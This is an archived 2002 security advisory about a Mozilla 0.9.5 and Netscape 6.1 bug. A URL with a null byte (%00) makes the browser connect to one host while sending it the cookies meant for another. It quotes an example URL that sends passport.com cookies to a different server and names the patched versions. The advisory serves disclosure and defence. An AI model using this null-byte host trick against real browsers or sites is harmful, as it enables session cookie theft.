TUCoPS :: Browsers :: nscp5020.htm

Netscape/Mozilla leaks cookies
23th Jan 2002 [SBWID-5020]
COMMAND

	Mozilla leaks cookies

SYSTEMS AFFECTED

	 Mozilla 0.9.5 build 2001111503 and 0.9.5 build 20011012 

	 Netscape 6.1 

PROBLEM

	In Marc Slemko advisory [http://alive.znep.com/~marcs/security] :
	

	--snip--
	

	Loading a URL such as:
	

	http://alive.znep.com%00www.passport.com/cgi-bin/cookies

	

	...will cause Mozilla to connect to the hostname  specified  before  the
	\"%00\", but send  the  cookies  to  the  server  based  on  the  entire
	hostname. The \"%00\" is the URL encoded version of the null  character,
	used in C to terminate strings.
	

	--snap--

SOLUTION

	Update to Netscape 6.2.1 or Mozilla 0.9.7

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH